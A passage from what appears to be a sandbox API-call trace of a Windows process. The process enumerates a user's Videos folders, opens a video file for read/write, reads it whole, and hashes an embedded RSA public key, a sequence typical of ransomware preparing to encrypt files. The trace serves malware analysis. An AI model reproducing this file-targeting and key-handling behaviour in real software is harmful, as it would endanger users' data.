(in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.673] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\") returned="0o41ZS\\" [0197.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.674] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\") returned="Y5X8\\" [0197.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0197.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea920 | out: hHeap=0x6a0000) returned 1 [0197.674] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\") returned="SVKL6Wu5uab uSVqvA\\" [0197.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0197.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0197.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0197.675] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0197.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d358 [0197.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.675] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0197.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d358 | out: hHeap=0x6a0000) returned 1 [0197.676] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.676] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.677] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.677] PathFindFileNameW (pszPath="") returned="" [0197.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.677] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x133d7f20, ftCreationTime.dwHighDateTime=0x1d8a6ad, ftLastAccessTime.dwLowDateTime=0xdaa3fa50, ftLastAccessTime.dwHighDateTime=0x1d8a6c4, ftLastWriteTime.dwLowDateTime=0xdaa3fa50, ftLastWriteTime.dwHighDateTime=0x1d8a6c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0197.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.679] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x133d7f20, ftCreationTime.dwHighDateTime=0x1d8a6ad, ftLastAccessTime.dwLowDateTime=0xdaa3fa50, ftLastAccessTime.dwHighDateTime=0x1d8a6c4, ftLastWriteTime.dwLowDateTime=0xdaa3fa50, ftLastWriteTime.dwHighDateTime=0x1d8a6c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.679] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd469690, ftCreationTime.dwHighDateTime=0x1d89e03, ftLastAccessTime.dwLowDateTime=0x12252e20, ftLastAccessTime.dwHighDateTime=0x1d8a6a9, ftLastWriteTime.dwLowDateTime=0x12252e20, ftLastWriteTime.dwHighDateTime=0x1d8a6a9, nFileSizeHigh=0x0, nFileSizeLow=0x915f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="235vhS8kOU7y.mp4", cAlternateFileName="235VHS~1.MP4")) returned 1 [0197.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d479f0 [0197.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0197.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d479f0 | out: hHeap=0x6a0000) returned 1 [0197.680] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\235vhS8kOU7y.mp4") returned=".mp4" [0197.680] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\235vhS8kOU7y.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\235vhs8kou7y.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.681] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=37215) returned 1 [0197.681] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.683] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x9139, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.683] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.686] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.686] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x915f, lpOverlapped=0x0) returned 1 [0197.687] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.687] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.687] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.687] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0197.688] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.688] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.688] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.688] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.688] GetLastError () returned 0x0 [0197.688] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.688] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0197.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.689] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.689] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.689] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9160) returned 0x2d4f778 [0197.689] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d358 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d3a0 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.690] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a450 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a438 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0197.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0197.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a498 | out: hHeap=0x6a0000) returned 1 [0197.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0197.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.693] GetCurrentThreadId () returned 0x264 [0197.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bdc0 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.694] GetCurrentThreadId () returned 0x264 [0197.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a498 [0197.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.697] RtlAllocateHeap 